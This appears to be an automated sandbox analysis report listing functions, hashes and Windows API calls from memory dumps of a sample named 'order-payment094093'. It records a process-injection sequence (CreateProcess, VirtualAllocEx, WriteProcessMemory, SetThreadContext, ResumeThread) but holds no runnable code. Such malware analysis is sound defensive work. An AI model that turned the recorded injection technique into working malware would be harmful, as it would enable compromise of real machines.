Source File: 00000000.00000002.2122055239.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d40000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6287126bb1e516c2e8026e37ecff2fe9aff070d037d2e3edf56ddd77772d43ee
Instruction ID: 254cccdbea38454c1eedd4fe1ffa7397b736e4cc14a2b7687476c4bffa74e808
Opcode Fuzzy Hash: 6287126bb1e516c2e8026e37ecff2fe9aff070d037d2e3edf56ddd77772d43ee
Instruction Fuzzy Hash: C521F671E016588BEB58CFAAD8547DEFBF3AFC9310F14C16AD408A6268DB740A56CF50

Function 05445F68 Relevance: 6.1, APIs: 4, Instructions: 131
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 05445FF6
GetCurrentThread.KERNEL32 ref: 05446033
GetCurrentProcess.KERNEL32 ref: 05446070
GetCurrentThreadId.KERNEL32 ref: 054460C9

Memory Dump Source

Source File: 00000000.00000002.2133458331.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5440000_order-payment094093.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 4b35a2d66e3348281f31fe49f41f061f28d1500473af7cda227ebfb146fb9a97
Instruction ID: 58047883caeb2e8ab57e3cc4e333279d0b35be1b1824cce9e607476d482f4168
Opcode Fuzzy Hash: 4b35a2d66e3348281f31fe49f41f061f28d1500473af7cda227ebfb146fb9a97
Instruction Fuzzy Hash: 8B5134B09003598FEB58CFAAD5487EEBBF1BF88314F20845AE409A7360DB755944CF65

Function 05445F78 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 05445FF6
GetCurrentThread.KERNEL32 ref: 05446033
GetCurrentProcess.KERNEL32 ref: 05446070
GetCurrentThreadId.KERNEL32 ref: 054460C9

Memory Dump Source

Source File: 00000000.00000002.2133458331.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5440000_order-payment094093.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: d4f560e162e05cec116bd4c2fe96e52143439136422d87922e47f958ad70d8f4
Instruction ID: 4a595a1f4b492da2a12ae0e649b1e477e96aa7a201c0258441ffccc708ecfc9d
Opcode Fuzzy Hash: d4f560e162e05cec116bd4c2fe96e52143439136422d87922e47f958ad70d8f4
Instruction Fuzzy Hash: 455123B09003598FEB58CFAAD548BEEBBF1BF88314F20845AE009A7360DB755944CF65

Function 0A043AEC Relevance: 1.8, APIs: 1, Instructions: 328
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A043DBF

Memory Dump Source

Source File: 00000000.00000002.2143910240.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a040000_order-payment094093.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 187d2dcefc8c0b5f87b9a0d1e0aae2dfbe8f0a5346399670906935cb5a7f4e58
Instruction ID: cb9dde7a632cff636fe07677fc38776d5bf87ef363a86e221eec04593cb95747
Opcode Fuzzy Hash: 187d2dcefc8c0b5f87b9a0d1e0aae2dfbe8f0a5346399670906935cb5a7f4e58
Instruction Fuzzy Hash: 99C115B0D0022D9FDB64CFA8C8517EDBBB1BF49300F10A5A9D909BB240DB749A85CF85

Function 0A043AF8 Relevance: 1.8, APIs: 1, Instructions: 321
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A043DBF

Memory Dump Source

Source File: 00000000.00000002.2143910240.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a040000_order-payment094093.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6b32c78b48996f9c723de854f1adc5bdc0a3f32032936b7284c70b9fe2995bcb
Instruction ID: d748883182627e4311bca9ee146bd93c3bb2ed33eadc4d31a4c42ba311e489a6
Opcode Fuzzy Hash: 6b32c78b48996f9c723de854f1adc5bdc0a3f32032936b7284c70b9fe2995bcb
Instruction Fuzzy Hash: DAC116B0D0022D9FDB64CFA8C8417EDBBB1BF49300F10A5A9D519BB240DB749A85CF95

Function 05443B90 Relevance: 1.7, APIs: 1, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(?), ref: 05443E12

Memory Dump Source

Source File: 00000000.00000002.2133458331.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5440000_order-payment094093.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 78f8fd353900881a0576d6dd01404e4a3b2923bf7a2bcd32f12d3c4d3ebe2325
Instruction ID: 8eea8f57afb7643adbfa8e712a20fdb58709861fa2032d9336c5791a7420b9c5
Opcode Fuzzy Hash: 78f8fd353900881a0576d6dd01404e4a3b2923bf7a2bcd32f12d3c4d3ebe2325
Instruction Fuzzy Hash: 73911470A007099FEB24DF6AD484B9ABBF1BF48704F10896AD44AE7750DB75E885CF90

Function 0544A8AA Relevance: 1.7, APIs: 1, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0544AA71

Memory Dump Source

Source File: 00000000.00000002.2133458331.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5440000_order-payment094093.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 977b5909bd5b8bf7de6dba551d94ac6890fba0ef1329b693d5e8ee487bdebc0f
Instruction ID: cc0dc42f34ecc908df724c559f910c32adc37efd06a4da08b67fd9a15a3ae7b9
Opcode Fuzzy Hash: 977b5909bd5b8bf7de6dba551d94ac6890fba0ef1329b693d5e8ee487bdebc0f
Instruction Fuzzy Hash: E0717BB4D04218DFDF60CFA9D984BDEBBB1BB09310F5491AAE808B7211D7709985CF54

Function 0544A8B0 Relevance: 1.7, APIs: 1, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0544AA71

Memory Dump Source

Source File: 00000000.00000002.2133458331.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5440000_order-payment094093.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 2f237496e9b381e569e7f3b23684739d7331cd3d1bad1f0506da7ce5e7c80779
Instruction ID: 82150489cdfea4ad9884ded8f2886f3413a23e23818f79d4de16aef18e4a26d6
Opcode Fuzzy Hash: 2f237496e9b381e569e7f3b23684739d7331cd3d1bad1f0506da7ce5e7c80779
Instruction Fuzzy Hash: 79717BB4D04218DFDF60CFA9D984BDEBBB1BB09300F1091AAE808B7211D7709985CF54

Function 054435A0 Relevance: 1.6, APIs: 1, Instructions: 126
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(?,?,?), ref: 0544413A

Memory Dump Source

Source File: 00000000.00000002.2133458331.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5440000_order-payment094093.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d6b939e2de47308ea9da02ddf8a18a2607f50e8fe27e395ce1417685b2b1c94a
Instruction ID: 7fcdd482a4579299cfc77f124e3ee20e93bf9cd929532544f6224dfc2a16aa2f
Opcode Fuzzy Hash: d6b939e2de47308ea9da02ddf8a18a2607f50e8fe27e395ce1417685b2b1c94a
Instruction Fuzzy Hash: 1041EEB5D042588FDB00CFA9D884ADEFFB1FB19310F14906AE958AB311D774A946CF54

Function 02D4C5CC Relevance: 1.6, APIs: 1, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02D4DF21

Memory Dump Source

Source File: 00000000.00000002.2122055239.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d40000_order-payment094093.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: ca260e451d4c0bb01c5537ecb6f62b541c229d095141c92873a4b7ccdbc1c418
Instruction ID: f383fcf9ca1abc12964b75597d5c03c70ead6921afa3c589f87da3d48fa8c604
Opcode Fuzzy Hash: ca260e451d4c0bb01c5537ecb6f62b541c229d095141c92873a4b7ccdbc1c418
Instruction Fuzzy Hash: B051B071D0022DCFDB21DFA8C944BDEBBB5AF49300F5081AAD509AB251DB716E89CF91

Function 0A043768 Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A043843

Memory Dump Source

Source File: 00000000.00000002.2143910240.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a040000_order-payment094093.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 6a8c5e9363cb326a6847f9c0e691a3af12b8af4421c33d1c99eb18cfd46b0d6b
Instruction ID: 65fbd96a5c3e798bafcb51dfa99e6eb9e3f2b7a97beabb8fbbca6da4b54b1c57
Opcode Fuzzy Hash: 6a8c5e9363cb326a6847f9c0e691a3af12b8af4421c33d1c99eb18cfd46b0d6b
Instruction Fuzzy Hash: E541BAB5D012599FCF00CFA9D980AEEFBF1BB49310F14902AE418B7210D379AA01CF54

Function 0A043770 Relevance: 1.6, APIs: 1, Instructions: 116
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A043843

Memory Dump Source

Source File: 00000000.00000002.2143910240.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a040000_order-payment094093.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 3702d626a6be0e429f24c802387548b8bacd4be3055709c12a3942701848c31a
Instruction ID: 1967ca45c2d05011a08c8adc2bd128f4e491014b052769626eb59caa856c539b
Opcode Fuzzy Hash: 3702d626a6be0e429f24c802387548b8bacd4be3055709c12a3942701848c31a
Instruction Fuzzy Hash: B941AAB5D012589FCF00CFA9D984ADEFBF1BB49310F10902AE418BB200D779AA41CF54

Function 054461B8 Relevance: 1.6, APIs: 1, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0544628B

Memory Dump Source

Source File: 00000000.00000002.2133458331.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5440000_order-payment094093.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b2bde52d6489c8d0121c63fa7480303be4120ff22090f78a14478fca16caae4d
Instruction ID: 8b9bd1a92da7142c3065afaee31b730423e99a10e9c37dfa8ff2038f5f911a8a
Opcode Fuzzy Hash: b2bde52d6489c8d0121c63fa7480303be4120ff22090f78a14478fca16caae4d
Instruction Fuzzy Hash: 6E4153B9D002589FDF00CFA9D984ADEBBF5BB09310F24906AE918BB310D375A955CF94

Function 0A0438C1 Relevance: 1.6, APIs: 1, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A04397A

Memory Dump Source

Source File: 00000000.00000002.2143910240.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a040000_order-payment094093.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 55a806e20efbc309649b2d62a8aa6f05e3e2949de62986aa91ad7198e10d144d
Instruction ID: c27b10275651951b63e19f6e1086b449b85a858b96cf98ae052401b1987d6177
Opcode Fuzzy Hash: 55a806e20efbc309649b2d62a8aa6f05e3e2949de62986aa91ad7198e10d144d
Instruction Fuzzy Hash: 0841A8B5D002589FCF10CFAAD880AEEFBB1BB49310F10A02AE815B7210D775A941CF68

Function 054461C0 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0544628B

Memory Dump Source

Source File: 00000000.00000002.2133458331.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5440000_order-payment094093.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 76c7c723624a151d1461df08da5ff0856afe5e1355d7220dc0f07371bea08926
Instruction ID: 429ea2196a657cad989b75cfabdb978e091e137e90a8a79ccbe190da1d84a7a4
Opcode Fuzzy Hash: 76c7c723624a151d1461df08da5ff0856afe5e1355d7220dc0f07371bea08926
Instruction Fuzzy Hash: 5F4144B9D002589FDF00CFA9D984ADEBBF5BB09310F24906AE918BB310D375A955CF94

Function 0A0438C8 Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A04397A

Memory Dump Source

Source File: 00000000.00000002.2143910240.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a040000_order-payment094093.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 4d14f56be02333f3a042b8da8a40678246903941a1ab3f83093723db6b93bfa9
Instruction ID: 119f4f2984fae874ccb18b6954399ed3ba2c3a57f43b824dffcb1ecb135b4046
Opcode Fuzzy Hash: 4d14f56be02333f3a042b8da8a40678246903941a1ab3f83093723db6b93bfa9
Instruction Fuzzy Hash: 8441A8B5D04258DFCF10CFAAD980AEEFBB1BB49310F10A02AE815B7250D775A945CF69

Function 0A043648 Relevance: 1.6, APIs: 1, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A0436FA

Memory Dump Source

Source File: 00000000.00000002.2143910240.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a040000_order-payment094093.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a33db04d4996411bf9e37c54f59a6c9a4251106f06be0cf2af88949076bd4a90
Instruction ID: 5d38cc82ce9dd9fb2f58dac5f51a3d250af9463c476a9329a0f5dd3b398c2afb
Opcode Fuzzy Hash: a33db04d4996411bf9e37c54f59a6c9a4251106f06be0cf2af88949076bd4a90
Instruction Fuzzy Hash: CE4199B9D002599FDF10CFA9D981A9EFBB1BB49310F10A02AE815BB310D775A901CF95

Function 0A043650 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A0436FA

Memory Dump Source

Source File: 00000000.00000002.2143910240.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a040000_order-payment094093.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c70f1d076bb5b5c89efa9b1e844fe7450a22cbf44716d3524e8b8d39173d924d
Instruction ID: 96b1d76c80954ddee3ec41a1aff380f1dad613a2d5de48cdd77d434e61a71301
Opcode Fuzzy Hash: c70f1d076bb5b5c89efa9b1e844fe7450a22cbf44716d3524e8b8d39173d924d
Instruction Fuzzy Hash: 923187B9D002599FDF10CFA9D980A9EFBB5BB49320F10A42AE815BB310D775A901CF59

Function 0A043520 Relevance: 1.6, APIs: 1, Instructions: 99threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0A0435D7

Memory Dump Source

Source File: 00000000.00000002.2143910240.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a040000_order-payment094093.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 7caac400e2c2f75a3f2029fb0503dccb717e31b8d7c07e625eab14a78de22492
Instruction ID: b866273f06b9092bf17f5e95faff5dc7faa80978f9303dd426fa07bcdc531a9d
Opcode Fuzzy Hash: 7caac400e2c2f75a3f2029fb0503dccb717e31b8d7c07e625eab14a78de22492
Instruction Fuzzy Hash: E341DCB4D01258DFDB10CFA9D885AEEBBF0BF49310F24902AE405BB240D778A945CF54

Function 054435B8 Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(?,?,?), ref: 0544413A

Memory Dump Source

Source File: 00000000.00000002.2133458331.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5440000_order-payment094093.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 532ddcfb9e4295fe7c3d024af09728fc2e0f9fe88c57a6afa86487af0fd81cf8
Instruction ID: 593b15d1e6fc2fc9469c39c7cc7867f5843c07616a1468079f7dab83d6d8f055
Opcode Fuzzy Hash: 532ddcfb9e4295fe7c3d024af09728fc2e0f9fe88c57a6afa86487af0fd81cf8
Instruction Fuzzy Hash: 7A4196B4D042589FDB10CFAAD884AEEFBF1BB09310F10906AE918B7310D374A945CF94

Function 05449724 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 0544D0E1

Memory Dump Source

Source File: 00000000.00000002.2133458331.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5440000_order-payment094093.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: b48e54c7bcea857859d4a60a72895783be5d15b3e130cf72b33d79ca191a3136
Instruction ID: 0d46608c41d147b1d844478ac3c3778f595065c49f45b36bd7dcb4f00c4699b8
Opcode Fuzzy Hash: b48e54c7bcea857859d4a60a72895783be5d15b3e130cf72b33d79ca191a3136
Instruction Fuzzy Hash: 9C4108B5A002198FEB14CF99C448AAABBF5FF88314F24C49AD519A7321D775A841CFA0

Function 0544408A Relevance: 1.6, APIs: 1, Instructions: 96libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(?,?,?), ref: 0544413A

Memory Dump Source

Source File: 00000000.00000002.2133458331.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5440000_order-payment094093.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8882f598e56186d42a615c25cb05a3e0530ca28e7e427efce93fcb779d29172d
Instruction ID: 467aeb06405b0d57d9d837138358cc88ae79301f7d273598657377a581967987
Opcode Fuzzy Hash: 8882f598e56186d42a615c25cb05a3e0530ca28e7e427efce93fcb779d29172d
Instruction Fuzzy Hash: A84194B9D002589FDB10CFAAD884ADEFBF1BB09310F14906AE818B7320D374A946CF54

Function 0A043528 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0A0435D7

Memory Dump Source

Source File: 00000000.00000002.2143910240.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a040000_order-payment094093.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c23653923ac80dce3f1b6ff486a5aee3b8c0756d0fc9abb0d4b79e21339440d9
Instruction ID: ef062077f48ac50ab32bc07ed845ec52c0dd27ced9d6a3ecc84979c6de55b9e6
Opcode Fuzzy Hash: c23653923ac80dce3f1b6ff486a5aee3b8c0756d0fc9abb0d4b79e21339440d9
Instruction Fuzzy Hash: 0831C9B4D012599FDB10CFAAD884AEEBBF0BF49310F24902AE409BB240D778A945CF54

Function 02D48450 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 02D484F7

Memory Dump Source

Source File: 00000000.00000002.2122055239.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d40000_order-payment094093.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: f6536b0069cdd1825d667cf37ff628097cb74d07e18730cb2fa69d88b4a4fe80
Instruction ID: 98d31e46d6aa2ac12c5910bdb3516a4534f4bd5ec09d59e75154f16fbb7ddaa3
Opcode Fuzzy Hash: f6536b0069cdd1825d667cf37ff628097cb74d07e18730cb2fa69d88b4a4fe80
Instruction Fuzzy Hash: 0D3199B9D042589FCB10CFA9E980ADEFBF1BB09310F24902AE814B7310D775A945CF64

Function 02D4844B Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 02D484F7

Memory Dump Source

Source File: 00000000.00000002.2122055239.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d40000_order-payment094093.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b6bbfd439c5657385627d4bccc52c86ecc3cbd77448bd5bdaba81e158abed2d4
Instruction ID: 8017283998e22c028151854d6343bd632fbc946fcfa5de865ff6f71f2fbd0801
Opcode Fuzzy Hash: b6bbfd439c5657385627d4bccc52c86ecc3cbd77448bd5bdaba81e158abed2d4
Instruction Fuzzy Hash: 6B319AB9D042589FCB10CFA9E984ADEFBB1BB49310F24906AE814B7310D775A945CF64

Function 0A047F58 Relevance: 1.6, APIs: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,00000000), ref: 0A047FFB

Memory Dump Source

Source File: 00000000.00000002.2143910240.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a040000_order-payment094093.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: f7d0c13fc5bf87d99db6b8d5315eff19541ea625e7768c2119c695f0f5ebb641
Instruction ID: e3dd78e0bea3c6a1d5e4e859f651781af9e41c902b7c2cdb4251e9e58f52bb64
Opcode Fuzzy Hash: f7d0c13fc5bf87d99db6b8d5315eff19541ea625e7768c2119c695f0f5ebb641
Instruction Fuzzy Hash: A33199B8D04258AFCB10CFA9D584ADEFBF5BB49310F24906AE814B7310D375A945CF64

Function 0A046238 Relevance: 1.6, APIs: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,00000000), ref: 0A047FFB

Memory Dump Source

Source File: 00000000.00000002.2143910240.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a040000_order-payment094093.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 6be7a58f4fc8920f637877006ca5500e90db40d46a74e9f5fab930e47e31d963
Instruction ID: bba49230466d42f3580c49062a58d123683ebe8ff9d7c03b5485a7b3cfb2ecab
Opcode Fuzzy Hash: 6be7a58f4fc8920f637877006ca5500e90db40d46a74e9f5fab930e47e31d963
Instruction Fuzzy Hash: C93188B9D04258AFCB50CF99D584ADEFBF4BB49310F24902AE814B7310D375A945CFA4

Function 0A043430 Relevance: 1.6, APIs: 1, Instructions: 78threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0A0434B6

Memory Dump Source

Source File: 00000000.00000002.2143910240.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a040000_order-payment094093.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f9f84b96e3131c4a0fb9d40286da33d5ae6c34aa53af4fb5efe8fa89e1678ced
Instruction ID: e2f52e246d9516a2d85a769507921a43dfaebe881cf76fec104fc12bf8933e12
Opcode Fuzzy Hash: f9f84b96e3131c4a0fb9d40286da33d5ae6c34aa53af4fb5efe8fa89e1678ced
Instruction Fuzzy Hash: C731AAB4D012589FDB14CFAAD981ADEFBF4BB89310F14906AE419B7310D775A901CFA4

Function 05443D80 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(?), ref: 05443E12

Memory Dump Source

Source File: 00000000.00000002.2133458331.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5440000_order-payment094093.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: cf0d14702760f1fcc02145f509749582d0e03351705c2e1465743be4f2f8fba1
Instruction ID: f036c14c664cc3aff5f73f80715f37040085db6688e339b3ec3459002107166c
Opcode Fuzzy Hash: cf0d14702760f1fcc02145f509749582d0e03351705c2e1465743be4f2f8fba1
Instruction Fuzzy Hash: 8631B7B4D002099FDB14CFAAD584ADEFBF5AB49310F24906AE818B7320D374A941CFA4

Function 0A043438 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0A0434B6

Memory Dump Source

Source File: 00000000.00000002.2143910240.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a040000_order-payment094093.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f04236e941e8f2c7520964f13739d78f6378567737115507a4abf556f125aab7
Instruction ID: bfd8eb62f56ff134d2256f1f3bcdaaa8d288996c009510b87346f4a24a76e070
Opcode Fuzzy Hash: f04236e941e8f2c7520964f13739d78f6378567737115507a4abf556f125aab7
Instruction Fuzzy Hash: EA31BAB4D012589FDB14CFAAD981ADEFBB4BB89320F14902AE415B7300C775A901CFA4

Function 098B94F4 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2143059726.00000000098B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_98b0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64e89b670d13cd102650dcb1ca5ac3ad51a17561ad13da086a95bb30ef29e545
Instruction ID: 9b97d04ccd1c225c381124d8182713aef3efcf84fc9cd83042c0cb06787047fe
Opcode Fuzzy Hash: 64e89b670d13cd102650dcb1ca5ac3ad51a17561ad13da086a95bb30ef29e545
Instruction Fuzzy Hash: 37519F70B002068FCB05DB79D8449AEBBF6FFC9324B14892AE559DB391EB709D05C791

Function 098B9834 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2143059726.00000000098B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_98b0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f255e05096f8485be7aa39e25209f815b9f2103362326962e8da1b36030a1b60
Instruction ID: bef75627b34b7c41969d8023e86b7200a0c8561a5c8acf33db25503351d5b244
Opcode Fuzzy Hash: f255e05096f8485be7aa39e25209f815b9f2103362326962e8da1b36030a1b60
